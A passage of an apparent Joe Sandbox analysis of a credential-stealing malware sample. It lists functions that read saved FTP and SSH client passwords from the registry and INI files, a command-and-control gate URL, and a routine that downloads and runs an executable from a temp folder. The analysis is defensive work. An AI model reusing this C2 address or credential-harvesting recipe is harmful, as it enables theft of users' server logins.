                  • Instruction Fuzzy Hash: CD11C171608684FFDB225B59CC01F997F75E702B14F544037F80A62DE2C33D8995EA5A
                  Function 004059A4 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 76registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00405A44
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405A74
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405AC2
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User
                  • API String ID: 1332880857-44262141
                  • Opcode ID: 82a121b7d479334669ea065cfc9f824c7b194ead91d8e360e6bde945351891f0
                  • Instruction ID: 827b3e11196b3a1f6855dec5ac7626f54dcd686911fa3a15bc7e57e71e1f856d
                  • Opcode Fuzzy Hash: 82a121b7d479334669ea065cfc9f824c7b194ead91d8e360e6bde945351891f0
                  • Instruction Fuzzy Hash: 8B215A35680A08FADF116A50CC42FDE7B76AB84B05F20C167B914740E1DBBD5AD0AF8C
                  Function 0040FE88 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 118stringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 133 40fe88-40fe90 134 410061-410064 133->134 135 40fe96-40fe9e call 403d6d 133->135 137 40fea3-40fea5 135->137 138 40feab-40feb2 137->138 139 41004f-41005b 137->139 138->139 140 40feb8-40fed2 call 401788 138->140 139->134 139->135 143 40ff0b-40ff0e 140->143 144 40ff10-40ff3b call 4012bb call 401133 143->144 145 40fed4-40ff0a wsprintfA call 401e4c 143->145 152 40ff41-40ff4b 144->152 153 410039-41004a call 4018b8 call 401021 144->153 145->143 152->153 154 40ff51-40ff64 GetTempPathA 152->154 153->139 154->153 156 40ff6a-40ff6f 154->156 156->153 158 40ff75-40ffab GetTickCount wsprintfA CreateDirectoryA call 4025a9 156->158 162 40ffcd-40ffdb call 401df8 158->162 163 40ffad-40ffcb call 401df8 call 401e4c 158->163 167 40ffe0-40fff9 call 401463 162->167 163->167 172 40fffb-410029 lstrlen call 4026dd ShellExecuteA 167->172 173 41002e-410034 call 4018b8 167->173 172->173 173->153
                  APIs
                    • Part of subcall function 00401788: GlobalFix.KERNEL32(?), ref: 004017AC
                    • Part of subcall function 00401788: GlobalUnWire.KERNEL32(?), ref: 004017C4
                  • wsprintfA.USER32 ref: 0040FEEA
                  • GetTempPathA.KERNEL32(00000104,?,00000000,00000000,00000002), ref: 0040FF5D
                  • GetTickCount.KERNEL32 ref: 0040FF75
                  • wsprintfA.USER32 ref: 0040FF87
                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0040FF98
                  • lstrlen.KERNEL32(true,?,00000000), ref: 00410000
                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00410029
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Globalwsprintf$CountCreateDirectoryExecutePathShellTempTickWirelstrcatlstrcpy
                  • String ID: %02X$%d.exe$MZ$http://dillion0mill.favcc1.com/gate.php$open$true
                  • API String ID: 2046336982-3971612383
                  • Opcode ID: 2c4d70772c038d31f2a651801e6808ad968590c1cfaea8d56924f70a9dc6c5f1
                  • Instruction ID: 5e7e8ec196055b916daf0811cf4189eaa6d594e6e3a9136c02a6053f2e225195
                  • Opcode Fuzzy Hash: 2c4d70772c038d31f2a651801e6808ad968590c1cfaea8d56924f70a9dc6c5f1
                  • Instruction Fuzzy Hash: 87418971900228AADB30AB61DC46FEEBBB99B05304F1001FBB548B50E1D6F84EC09F58
                  Function 004020B9 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 172registrystringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,?), ref: 00402126
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00402166
                  • lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF), ref: 00402219
                  • lstrlen.KERNEL32(?,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000), ref: 00402252
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00402289
                  • GlobalFix.KERNEL32(?), ref: 004022E5
                  • GlobalUnWire.KERNEL32(?), ref: 00402304
                  • GlobalFix.KERNEL32(?), ref: 00402346
                  • GlobalUnWire.KERNEL32(?), ref: 00402365
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Global$LocalWirelstrlen$AllocCloseEnumFreeOpen
                  • String ID: DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                  • API String ID: 3331298335-981893429
                  • Opcode ID: 78ccc2f1aa60e3416ca88cf7f8dd1cbb5aa3d6f7378005a1d88f96d45fb0cb00
                  • Instruction ID: 84ae9b620de372073d243899cfc9af4e2d6adf62d97d04a31c0a33c893754acd
                  • Opcode Fuzzy Hash: 78ccc2f1aa60e3416ca88cf7f8dd1cbb5aa3d6f7378005a1d88f96d45fb0cb00
                  • Instruction Fuzzy Hash: 70615A35900158BADF31AB61CD46FE9B679EB44304F0040FBB588B11E1D7B89FD4AE68
                  Function 00402C01 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 406 402c01-402c12 407 402c14 406->407 408 402c15-402c1d 406->408 409 402c31-402c35 408->409 410 402c1f-402c26 408->410 410->409 411 402c28-402c2f 410->411 411->409 412 402c36-402c4c GetCurrentProcess OpenProcessToken 411->412 413 402ce2-402ce6 412->413 414 402c52-402c6e GetTokenInformation 412->414 415 402c70-402c78 GetLastError 414->415 416 402cda-402cdd CloseHandle 414->416 415->416 417 402c7a-402c7e 415->417 416->413 417->416 418 402c80-402ca2 call 4018cf GetTokenInformation 417->418 421 402cd2-402cd5 call 4018b8 418->421 422 402ca4-402cb6 ConvertSidToStringSidA 418->422 421->416 422->421 423 402cb8-402cc7 lstrcmp 422->423 425 402cc9 423->425 426 402cca-402ccd LocalFree 423->426 425->426 426->421
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: S-1-5-18
                  • API String ID: 0-4289277601
                  • Opcode ID: fe3412653b432fb7081d064e6c8d51966c81f9116d79f6c0f274a0f0d657c57c
                  • Instruction ID: 6b6090d31a5c6fcca081062ba3589e3e6a7b1e724d38dab3f2815562cfe67d7f
                  • Opcode Fuzzy Hash: fe3412653b432fb7081d064e6c8d51966c81f9116d79f6c0f274a0f0d657c57c
                  • Instruction Fuzzy Hash: D6215130A0820DBFEF119BA0DD4ABEE7B79BB44349F104576A500B51E1D7F9AA90DB18
                  Function 0040668F Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 427 40668f-4066ac RegOpenKeyA 428 406911-406912 427->428 429 4066b2 427->429 430 4066b9-4066e0 RegEnumKeyExA 429->430 431 4066e2-40690c RegCloseKey 430->431 432 4066e7-4067a5 call 401df8 call 401e4c call 401d71 * 5 430->432 431->428 448 4067a7-4067ae 432->448 449 4067ba 432->449 448->449 450 4067b0-4067b8 448->450 451 4067c4-4067e9 call 4018b8 call 401d71 449->451 450->451 456 4067eb-4067f2 451->456 457 4067fe 451->457 456->457 458 4067f4-4067fc 456->458 459 406808-406815 call 4018b8 457->459 458->459 462 406856-40685d 459->462 463 406817-40681e 459->463 465 4068ca-406904 call 4018b8 * 5 462->465 466 40685f-406866 462->466 463->462 464 406820-406836 call 4043dc 463->464 473 406841-40684c call 4018b8 464->473 474 406838-40683f 464->474 465->430 466->465 469 406868-40686f 466->469 469->465 472 406871-4068c5 call 401569 call 4015cb * 2 call 40159f call 401569 call 4015cb 469->472 472->465 473->462 474->462 474->473
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 004066A5
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004066D9
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040690C
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: Host$InitialPath$Login$Password$PasswordType$Port
                  • API String ID: 1332880857-4069465341
                  • Opcode ID: c8743c9cceaed051e5646415545396c527bd300168c387efee5c4547e0bbd88b
                  • Instruction ID: 60b74f4eec54860747f977c3a0984199eafcb12fde0b352d74415cb97445bb27
                  • Opcode Fuzzy Hash: c8743c9cceaed051e5646415545396c527bd300168c387efee5c4547e0bbd88b
                  • Instruction Fuzzy Hash: 3751E43190011CEADF217B61CC42BED7AB9BF44308F10C4BAA549750B1DB7A5BA5DF88
                  Function 0040D072 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 147registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 496 40d072-40d08c RegOpenKeyA 497 40d092 496->497 498 40d2c7-40d2c8 496->498 499 40d099-40d0c0 RegEnumKeyExA 497->499 500 40d0c2-40d2c2 RegCloseKey 499->500 501 40d0c7-40d15e call 401df8 * 2 call 4018b8 call 401d71 * 4 499->501 500->498 517 40d160-40d167 501->517 518 40d179-40d17b 501->518 517->518 519 40d169-40d177 call 4018b8 517->519 520 40d183 518->520 521 40d17d-40d17e call 4018b8 518->521 524 40d18d-40d1ca call 401d71 * 2 519->524 520->524 521->520 530 40d1d0-40d1e6 call 4043dc 524->530 531 40d264-40d2ba call 4018b8 * 5 call 40d072 call 4018b8 524->531 530->531 536 40d1e8-40d1ec 530->536 531->499 536->531 538 40d1ee-40d1f5 536->538 538->531 540 40d1f7-40d1fe 538->540 540->531 542 40d200-40d25f call 401569 call 4015cb * 2 call 40159f call 401569 call 4015cb * 2 540->542 542->531
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040D085
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D0B9
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D2C2
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: InitialDirectory$Password$PortNumber$ServerName$ServerType$UserID
                  • API String ID: 1332880857-2649023343
                  • Opcode ID: e96c5e77c0307f3c9bb25c44ee86e568ec663d8e8838f4751b7fbd956fc35cd7
                  • Instruction ID: 296f03f89817dc355ee3c70bcdfec8fb59ebe532a645e72c161d468f48bd9d07
                  • Opcode Fuzzy Hash: e96c5e77c0307f3c9bb25c44ee86e568ec663d8e8838f4751b7fbd956fc35cd7
                  • Instruction Fuzzy Hash: 7B51C931840118BADF216FA1CC02FDD7AB9BF04704F14C1BAB548750B1DB7A9A95AF98
                  Function 00407BBA Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 146registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 565 407bba-407bd4 RegOpenKeyA 566 407bda 565->566 567 407e1c-407e1d 565->567 568 407be1-407c08 RegEnumKeyExA 566->568 569 407c0a-407e17 RegCloseKey 568->569 570 407c0f-407cc2 call 401df8 * 2 call 4018b8 call 401d71 * 5 568->570 569->567 588 407cc4-407ccb 570->588 589 407cdd-407cdf 570->589 588->589 590 407ccd-407cdb call 4018b8 588->590 591 407ce1-407ce2 call 4018b8 589->591 592 407ce7 589->592 595 407cf1-407d18 call 401d71 590->595 591->592 592->595 599 407db9-407e0f call 4018b8 * 5 call 407bba call 4018b8 595->599 600 407d1e-407d25 595->600 599->568 600->599 601 407d2b-407d32 600->601 601->599 603 407d38-407d92 call 401569 call 4015cb * 3 call 401569 call 4015cb 601->603 629 407d94-407d9b 603->629 630 407daf-407db4 call 401569 603->630 629->630 631 407d9d-407dad call 401569 629->631 630->599 631->599
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407BCD
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407C01
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407E17
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
                  • API String ID: 1332880857-3874328862
                  • Opcode ID: 576aeb20b8da2a346b2c6878d112f1ab8c7ac0afabfb176daed961f7ae132215
                  • Instruction ID: 7ed76bb6ddb90ca6b6d7746bd4a4b5284c2826ddfe58928be53a16e92354ad06
                  • Opcode Fuzzy Hash: 576aeb20b8da2a346b2c6878d112f1ab8c7ac0afabfb176daed961f7ae132215
                  • Instruction Fuzzy Hash: 3751E23190011CFADF226F61CC42BED7AB9BF44304F10C1BAB548750B1DB7A6A91AF99
                  Function 0040DC62 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 133registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DC75
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DCA9
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DE92
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: FTP destination catalog$FTP destination password$FTP destination port$FTP destination server$FTP destination user$FTP profiles
                  • API String ID: 1332880857-3620412361
                  • Opcode ID: 890ebede2d2a8dd96af920084625a8149e6ee07f197615ee9771f6f861db39d0
                  • Instruction ID: 2e15d2936ffe5f560d63a88a4008a699ed4cc948832ac2dcc07f9040825ba3ae
                  • Opcode Fuzzy Hash: 890ebede2d2a8dd96af920084625a8149e6ee07f197615ee9771f6f861db39d0
                  • Instruction Fuzzy Hash: 12519571850118AADF226F61CC42FDD7ABAFF04304F1081B6B548750B1DF7A9AA5AFC8
                  Function 00407F0C Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 126registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407F1F
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407F53
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040811B
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: PassWord$Port$RootDirectory$ServerType$Url$UserName
                  • API String ID: 1332880857-2128033141
                  • Opcode ID: 3e088ef90c261c8eade7992984eec14fc9838e3d5bc41605b6ca3b26f8faf7a1
                  • Instruction ID: 430170de0c9e182448d10976ce2ebc3df858e521166c14d94edddc0f9fe91ec0
                  • Opcode Fuzzy Hash: 3e088ef90c261c8eade7992984eec14fc9838e3d5bc41605b6ca3b26f8faf7a1
                  • Instruction Fuzzy Hash: B251843184011CBADF226F51CD42BED7AB9BF04344F14C5BAB558740B1DB7A5B91AF88
                  Function 004026DD Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 84registryfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 754 4026dd-4026ff RegCreateKeyA 755 402701-402718 RegSetValueExA 754->755 756 402723-402725 754->756 757 40271a 755->757 758 40271b-40271e RegCloseKey 755->758 759 4027f0-4027f4 756->759 760 40272b-40273e GetTempPathA 756->760 757->758 758->756 760->759 761 402744-402749 760->761 761->759 762 40274f-40276b CreateDirectoryA call 4025a9 761->762 765 402789-402793 call 401df8 762->765 766 40276d-402787 call 401df8 call 401e4c 762->766 770 402798-4027bc ExitProcess 765->770 766->770 772 4027d6-4027d8 770->772 773 4027be-4027d1 call 401422 CloseHandle 770->773 776 4027e5-4027eb call 4018b8 772->776 777 4027da-4027e0 DeleteFileA 772->777 773->772 776->759 777->776
                  APIs
                  • RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 004026F8
                  • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,?), ref: 00402711
                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000003,?,?), ref: 0040271E
                  • GetTempPathA.KERNEL32(00000104,?), ref: 00402737
                  • CreateDirectoryA.KERNEL32(?,00000000,00000104,?), ref: 00402758
                  • ExitProcess.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004027B3
                  • CloseHandle.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004027D1
                  • DeleteFileA.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004027E0
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseCreate$DeleteDirectoryExitFileHandlePathProcessTempValue
                  • String ID: Software\WinRAR
                  • API String ID: 2428708885-224198155
                  • Opcode ID: 0e20d51e1d58d3bb74ee18c8e8ca7f5743b969d504c9cd0a6024cf1410df27d1
                  • Instruction ID: 157a8912ca7c1a7fe7393ecf2fd600d07835d881cd8a5d899f858a14032d65c4
                  • Opcode Fuzzy Hash: 0e20d51e1d58d3bb74ee18c8e8ca7f5743b969d504c9cd0a6024cf1410df27d1
                  • Instruction Fuzzy Hash: ED217F3194020DBBDF21AFA0CD86FDD7A79AB14748F104076B204B61E1E6F99AD0AB18
                  Function 0040504B Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 83COMMON
                  Download Yara Rule
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040506F
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                  • GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,00414841,?,00000104,?), ref: 004050BF
                  • GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,00414841,?,00000104,?), ref: 004050FA
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: PrivateProfileStringlstrlen$DirectoryWindowslstrcatlstrcpy
                  • String ID: DEFDIR$DIR$WS_FTP$\Ipswitch$\Ipswitch\WS_FTP$\win.ini
                  • API String ID: 2508676433-45949541
                  • Opcode ID: 617eafbe3b2a9aae966c5c33004e4f48d5a715310b0037202ab27aed9257ffc9
                  • Instruction ID: ebe339de3fdbf1d579a705e47446e40e67bff61f5bd7bc8680dff245f29a07b1
                  • Opcode Fuzzy Hash: 617eafbe3b2a9aae966c5c33004e4f48d5a715310b0037202ab27aed9257ffc9
                  • Instruction Fuzzy Hash: F4213570E80208BADF227A61CC43FDE3629AB54744F1004777708B51E2D7F88BD09A6C
                  Function 0040E9F9 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 83registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EA1C
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040EA50
                  • GetPrivateProfileStringA.KERNEL32(Program,DataPath,00414841,?,00000104,00000000), ref: 0040EAD6
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040EB2F
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocCloseEnumLocalOpenPrivateProfileString
                  • String ID: DataPath$Path$Program$\PocoSystem.ini$accounts.ini
                  • API String ID: 1343824468-2495907966
                  • Opcode ID: c6565fed3bebbfd09dec3b12eb6792bc7fa45e8abdb7b78d5d8cdd4fe1ef8cdd
                  • Instruction ID: 04c84614dc5648a840b62c88156f807ae285f31e25a4b420b7857044e6c62386
                  • Opcode Fuzzy Hash: c6565fed3bebbfd09dec3b12eb6792bc7fa45e8abdb7b78d5d8cdd4fe1ef8cdd
                  • Instruction Fuzzy Hash: D7313831940118BADF11BB51CC42FDD7ABAFF04704F1084BAB554700E1DAB95BA1AF98
                  Function 004063FD Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 140registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00406413
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406447
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406655
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: Host$Port$PthR$SSH$User
                  • API String ID: 1332880857-1643752846
                  • Opcode ID: 85bf68aa81c8cd846817fb2e0aa57636f573a179e5e418ac3ecd4382fc6ef1c6
                  • Instruction ID: e5a53c457b0f81dda7226a2ae750285297bc0a50b8b03840570f84a557d45c70
                  • Opcode Fuzzy Hash: 85bf68aa81c8cd846817fb2e0aa57636f573a179e5e418ac3ecd4382fc6ef1c6
                  • Instruction Fuzzy Hash: 0051F431900118FADF21AB61CC42BED7AB9BF44304F10C5BAB545750F1DB7A5BA1AF88
                  Function 00405F4C Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 121registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00405F62
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405F96
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406142
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumFreeLocalOpen
                  • String ID: HostAdrs$Password$Port$RemoteDir$UserName
                  • API String ID: 3369285772-3748300950
                  • Opcode ID: f96c8e4a5409443dde98251c7b2f3d6094f6950086ca3bcc90c3b53c61355e26
                  • Instruction ID: 3bb7e89873ff6066ea354e00b7e60ba4867d3cd41710c9b4924befb8fba13e4f
                  • Opcode Fuzzy Hash: f96c8e4a5409443dde98251c7b2f3d6094f6950086ca3bcc90c3b53c61355e26
                  • Instruction Fuzzy Hash: 3E41043194011CEADF21AB61CC42FDD7AB9BF44304F10C5BAB549740F1DBBA5AA1AF88
                  Function 0040717C Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040718F
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004071C3
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407355
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: Directory$Password$Server$UserName$_Password
                  • API String ID: 1332880857-3317168126
                  • Opcode ID: ae757cd09bdfb33c871b73b175631fe01feb53c4eaabdf43a60bca6855f65ea7
                  • Instruction ID: 8709259afb1f932f2079872e9f7719065b6457ffac453c5e8edc16422e7fc723
                  • Opcode Fuzzy Hash: ae757cd09bdfb33c871b73b175631fe01feb53c4eaabdf43a60bca6855f65ea7
                  • Instruction Fuzzy Hash: 9841C13184011CBADF226F51CC02BDD7ABABF04344F14C1BAB958781B1DB7A5B91AF89
                  Function 0040D9FA Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DA0D
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DA41
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DBD5
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
